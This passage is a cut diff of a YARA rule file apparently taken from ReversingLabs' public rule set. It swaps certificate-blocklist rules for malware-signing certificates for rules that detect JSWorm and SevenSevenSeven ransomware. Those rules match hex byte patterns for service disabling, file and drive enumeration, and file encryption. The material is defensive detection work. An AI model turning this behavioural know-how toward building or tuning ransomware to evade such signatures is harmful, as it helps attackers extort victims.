+            ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 75 ?? 8D 85 ?? ?? ?? ??
+            8B 8D ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B 45 ??
+            8B 48 ?? 8B 45 ?? E8
+        }
+		$disable_services_p1 = {
+            E8 ?? ?? ?? ?? 8B F0 BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08
+            FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA
+            ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ??
+            8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08
+            FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA
+            ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ??
+            8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08
+            FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA
+            ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ??
+            8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08
+            FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA
+            ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ??
+            8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08
+            FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA
+            ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA
+        }
+		$disable_services_p2 = {
+            8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08
+            FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA
+            ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ??
+            8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08
+            FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA
+            ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ??
+            8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08
+            FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA
+            ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ??
+            8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08
+            FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA
+            ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? 8B 55 ?? 8B C6 8B 08 FF 51 ?? 6A ?? 8B 45 ?? E8 ??
+            ?? ?? ?? 8B D0 8D 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? 33 C9 33 D2 E8 ?? ?? ?? ?? 33 C0 5A
+            59 59 64 89 10 68 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? C3
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Hohhot Handing Trade and Business Co., Ltd." and pe.signatures [ i ] . serial == "6e:d2:45:0c:ea:c0:f7:2e:73:fd:a1:72:7e:66:e6:54" and 1376092799 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( ( all of ( $disable_services_p* ) ) and ( all of ( $search_files_p* ) ) and ( $encrypt_files ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_32665079C5A5854A6833623Ca77Ff5Ac : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Jsworm : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects JSWorm ransomware."
 		author = "ReversingLabs"
-		id = "7078e95f-8bbe-5446-b9cb-c079f8448cb1"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "a4702cc3-1e08-5631-b832-5d28cb92a819"
+		date = "2020-06-26"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L387-L403"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.JSWorm.yara#L1-L93"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "6b734ca733c5fbadcb490ffd4c19c951e0fc17dd9b660eca948b126038c42cdb"
+		logic_hash = "8ba5e2f29f5f06e6e6714bbba1129862da8c3a83bf7f296818eddee2593cae38"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "JSWorm"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Ohanae" and pe.signatures [ i ] . serial == "32:66:50:79:c5:a5:85:4a:68:33:62:3c:a7:7f:f5:ac" and 1381967999 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_01A90094C83412C00Cf98Dd2Eb0D7042 : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "e5059974-9ea2-5497-a728-c21a6cdd30e4"
-		date = "2020-08-05"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L405-L421"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "5a3de0e6de5cda39e40988f9e2324cbee3e059aff5ceaf7fd819de8bf7215808"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$find_files = {
+            68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 BD ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ??
+            68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D
+            85 ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50
+            FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF D6 85 C0 0F 84
+            ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ??
+            ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? A8 ??
+            0F 85 ?? ?? ?? ?? A8 ?? 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 95 ?? ?? ?? ?? 8D
+            8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B F0 C6 45 ?? ?? 8B 4E ?? 8B 56 ?? 3B CA 73
+            ?? 8D 41 ?? 89 46 ?? 8B C6 83 FA ?? 72 ?? 8B 06 C7 04 48 ?? ?? ?? ?? EB ?? 6A ?? C6
+            85 ?? ?? ?? ?? ?? 8B CE FF B5 ?? ?? ?? ?? 6A ?? E8
+        }
+		$find_drives = {
+            68 ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? 80 3D ?? ?? ?? ?? ?? BE ?? ?? ?? ?? 0F 84 ??
+            ?? ?? ?? 8B CE C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 8D 51 ?? 8A 01
+            41 84 C0 75 ?? 2B CA 51 56 8D 4D ?? E8 ?? ?? ?? ?? 83 EC ?? C7 45 ?? ?? ?? ?? ?? 8B
+            CC 89 65 ?? 33 C0 6A ?? 68 ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? 66
+            89 01 E8 ?? ?? ?? ?? 83 EC ?? C6 45 ?? ?? 8D 55 ?? 8B CC E8 ?? ?? ?? ?? C6 45 ?? ??
+            E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 83 FA ?? 72 ?? 8B 4D ?? 42 8B
+            C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 77 ?? 52 51 E8
+            ?? ?? ?? ?? 83 C4 ?? 8B C6 8D 50 ?? 8A 08 40 84 C9 75 ?? 2B C2 46 03 F0 38 0E 0F 85
+            ?? ?? ?? ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5E 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5
+            5D C3 E8 ?? ?? ?? ?? E8
+        }
+		$encrypt_files_p1 = {
+            8B 00 50 FF 15 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B F0 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ??
+            42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ??
+            ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? C7 85
+            ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 83 FA ??
+            72 ?? 8B 8D ?? ?? ?? ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ??
+            83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B
+            CB C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 83 E6 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 33 C0 66 89
+            85 ?? ?? ?? ?? 8D 51 ?? 66 8B 01 83 C1 ?? 66 85 C0 75 ?? 2B CA D1 F9 51 53 8D 8D ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 83 78 ?? ?? 72 ?? 8B 00 56 50 FF 15 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 83 FA
+            ?? 72 ?? 8B 8D ?? ?? ?? ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1
+            83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ??
+            ?? 8B 95 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6
+            85 ?? ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA
+            ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51
+            E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 53 FF
+            15 ?? ?? ?? ?? 8B D8 8D 45 ?? 50 53 89 9D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 7D ?? ??
+            0F 8C ?? ?? ?? ?? 7F ?? 81 7D ?? ?? ?? ?? ?? 0F 86 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 53
+            FF 15 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ??
+            ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ??
+            ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 83 C4 ?? 8B F8 89 BD ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 57 E8 ?? ?? ?? ??
+            B9 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? BE ?? ?? ?? ?? 83 C4 ?? F3 A5 8D 8D ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 33 F6
+        }
+		$encrypt_files_p2 = {
+            8B 86 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 86 ?? ?? ?? ?? 89 85 ?? ??
+            ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89
+            86 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 86 ?? ?? ?? ?? 83 C6 ?? 81 FE ?? ?? ?? ?? 7C ??
+            6A ?? 6A ?? 6A ?? 53 FF 15 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 FF 75 ?? 68 ?? ?? ?? ?? 53
+            FF 15 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 83 EC ?? 8B F4 8B CA 33 C0
+            C7 46 ?? ?? ?? ?? ?? 8D 79 ?? C7 46 ?? ?? ?? ?? ?? 66 89 06 66 8B 01 83 C1 ?? 66 85
+            C0 75 ?? E9 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 53 8B 1D ?? ?? ?? ?? FF D3 6A ?? 8D 45 ??
+            50 FF 75 ?? 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85
+            ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ??
+            ?? ?? ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B
+            F8 89 BD ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ??
+            ?? ?? ?? ?? ?? B9 ?? ?? ?? ?? BE ?? ?? ?? ?? F3 A5 8B 45 ?? 8D 8D ?? ?? ?? ?? 50 68
+            ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 56
+            FF D3 6A ?? 8D 45 ?? 50 FF 75 ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 56 FF 15
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FreeVox SA" and pe.signatures [ i ] . serial == "01:a9:00:94:c8:34:12:c0:0c:f9:8d:d2:eb:0d:70:42" and 1376956799 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and $find_drives and $find_files and ( all of ( $encrypt_files_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_55Efe24B9674855Baf16E67716479C71 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Sevensevenseven : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects SevenSevenSeven ransomware."
 		author = "ReversingLabs"
-		id = "c1a4102e-ce78-5a4d-95ea-b9e394df0c28"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "049531bd-9505-5da1-9512-980383c8c5ec"
+		date = "2020-06-26"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L423-L439"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.SevenSevenSeven.yara#L1-L148"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "2cf7a76ae3c3a698564013ff545c74d0319face5aa19416c93bf10f45f84f8c9"
+		logic_hash = "583a8ac746cd749bd3927f10c864a3ac84f82f8bbd8d0ebf117e22b016d7ca94"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "SevenSevenSeven"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "S2BVISIO BELGIQUE SA" and pe.signatures [ i ] . serial == "55:ef:e2:4b:96:74:85:5b:af:16:e6:77:16:47:9c:71" and 1374451199 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_094Bf19D509D3074913995160B195B6C : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "8241e2c6-e4e7-581c-b759-6314d2e28a4d"
-		date = "2020-08-05"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L441-L457"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "3c1ed012716f36876d9375838befb9821b87cafc6aca57a0f18392f80f5ba325"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$file_search_p1 = {
+            55 8B EC 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ??
+            ?? 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 89 45 ?? 53 56 57 89 65 ?? BE ?? ?? ?? ?? 89 75
+            ?? 33 DB 89 5D ?? 88 5D ?? 89 75 ?? 89 5D ?? 88 5D ?? 89 75 ?? 88 5D ?? 68 ?? ?? ??
+            ?? 8B 45 ?? 50 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 53 50 8D 4D ?? E8
+            ?? ?? ?? ?? BF ?? ?? ?? ?? 39 BD ?? ?? ?? ?? 72 ?? 8B 95 ?? ?? ?? ?? 52 E8 ?? ?? ??
+            ?? 83 C4 ?? 39 7D ?? 8B 45 ?? 73 ?? 8D 45 ?? 8D 8D ?? ?? ?? ?? 51 50 FF 15 ?? ?? ??
+            ?? 89 85 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? EB ?? BE ?? ?? ?? ?? 90 6A ?? 53 8D
+            4D ?? E8 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 68 ?? ?? ?? ?? 8B 45 ?? 50 8D 8D ?? ?? ??
+            ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 50 8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 6A ??
+            53 50 8D 4D ?? E8 ?? ?? ?? ?? 39 BD ?? ?? ?? ?? 72 ?? 8B 85 ?? ?? ?? ?? 50 E8 ?? ??
+            ?? ?? 83 C4 ?? 89 B5 ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 88 9D ?? ?? ?? ?? 39 BD ?? ?? ??
+            ?? 72 ?? 8B 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 89 B5 ?? ?? ?? ?? 89 9D ?? ??
+            ?? ?? 88 9D ?? ?? ?? ?? 39 7D ?? 8B 75 ?? 73 ?? 8D 75 ?? 68 ?? ?? ?? ?? 56 FF 15 ??
+            ?? ?? ?? 85 C0 74 ?? B8 ?? ?? ?? ?? EB ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 85 C0
+        }
+		$file_search_p2 = {
+            74 ?? B8 ?? ?? ?? ?? EB ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? F7 D8 1B C0 F7 D8 3B
+            C3 0F 85 ?? ?? ?? ?? 80 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? F6 85 ?? ?? ?? ?? ?? 74
+            ?? 8B 45 ?? 3A C3 0F 84 ?? ?? ?? ?? 50 8D 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B F0 3B
+            F3 0F 84 ?? ?? ?? ?? 39 7D ?? 72 ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 39 7D ?? 72
+            ?? 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ?? 89 5D ?? 88 5D ?? 39 7D
+            ?? 0F 82 ?? ?? ?? ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B C6 E9 ?? ?? ?? ?? 8D 85
+            ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B F0 38 1E 74 ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ??
+            ?? 85 C0 74 ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 68 ?? ?? ?? ?? 56 FF
+            15 ?? ?? ?? ?? 85 C0 74 ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 89 5D ??
+            39 7D ?? 8B 45 ?? 73 ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ?? EB
+            ?? B8 ?? ?? ?? ?? C3
+        }
+		$encrypt_file_1 = {
+            81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 55 8B AC 24 ?? ?? ?? ?? 56 55 89 84 24 ?? ?? ?? ??
+            33 F6 FF 15 ?? ?? ?? ?? 33 C9 85 C0 76 ?? 8D 9B ?? ?? ?? ?? 80 3C 29 ?? 75 ?? 46 41
+            3B C8 72 ?? 83 FE ?? 75 ?? 5E 33 C0 5D 8B 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 81 C4 ??
+            ?? ?? ?? C3 57 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 55 FF 15 ?? ?? ?? ?? 8B
+            F8 83 FF ?? 75 ?? 5F 5E 33 C0 5D 8B 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 81 C4 ?? ?? ??
+            ?? C3 53 6A ?? 57 FF 15 ?? ?? ?? ?? 8B D8 83 FB ?? 73 ?? 57 FF 15 ?? ?? ?? ?? 5B 5F
+            5E 33 C0 5D 8B 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C3 53 6A ?? FF 15
+            ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 57 8B F0 FF 15 ?? ?? ?? ?? 6A ?? 8D 44 24 ?? 50 53 56
+            57 FF 15 ?? ?? ?? ?? 33 C0 85 DB 76 ?? 8D 49 ?? 80 34 30 ?? 40 3B C3 72 ?? 6A ?? 6A
+            ?? 6A ?? 57 FF 15 ?? ?? ?? ?? 6A ?? 8D 4C 24 ?? 51 53 56 57 FF 15 ?? ?? ?? ?? 57 FF
+            15 ?? ?? ?? ?? 8D 54 24 ?? 52 FF 15 ?? ?? ?? ?? 0F B7 44 24 ?? 0F B7 4C 24 ?? 0F B7
+            54 24 ?? 68 ?? ?? ?? ?? 50 0F B7 44 24 ?? 51 0F B7 4C 24 ?? 52 0F B7 54 24 ?? 50 51
+            52 55 8D 44 24 ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8D 4C 24 ?? 51 68 ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 83 C4 ?? 8D 54 24 ?? 52 55 FF 15 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 8B
+            8C 24 ?? ?? ?? ?? 5B 5F 5E B8 ?? ?? ?? ?? 5D E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C3
+        }
+		$encrypt_file_2 = {
+            81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 55 8B AC 24 ?? ?? ?? ?? 56 55 89 84 24 ?? ?? ?? ??
+            33 F6 FF 15 ?? ?? ?? ?? 33 C9 85 C0 76 ?? 8D 9B ?? ?? ?? ?? 80 3C 29 ?? 75 ?? 46 41
+            3B C8 72 ?? 83 FE ?? 74 ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 55 FF 15 ??
+            ?? ?? ?? 8B F0 83 FE ?? 75 ?? 5E 33 C0 5D 8B 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 81 C4
+            ?? ?? ?? ?? C3 53 6A ?? 56 FF 15 ?? ?? ?? ?? 8B D8 83 FB ?? 73 ?? 56 FF 15 ?? ?? ??
+            ?? 5B 5E 33 C0 5D 8B 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C3 57 8D 83
+            ?? ?? ?? ?? 50 6A ?? FF 15 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 56 8B F8 FF 15 ?? ?? ?? ??
+            6A ?? 8D 4C 24 ?? 51 53 57 56 FF 15 ?? ?? ?? ?? 8B CB C1 E9 ?? 41 74 ?? 8D 47 ?? B2
+            ?? 80 70 ?? ?? 80 70 ?? ?? 80 30 ?? 80 70 ?? ?? 80 70 ?? ?? 80 70 ?? ?? 80 70 ?? ??
+            30 50 ?? 83 C0 ?? 49 75 ?? 6A ?? 6A ?? 6A ?? 56 FF 15 ?? ?? ?? ?? 6A ?? 8D 54 24 ??
+            52 53 57 56 FF 15 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ??
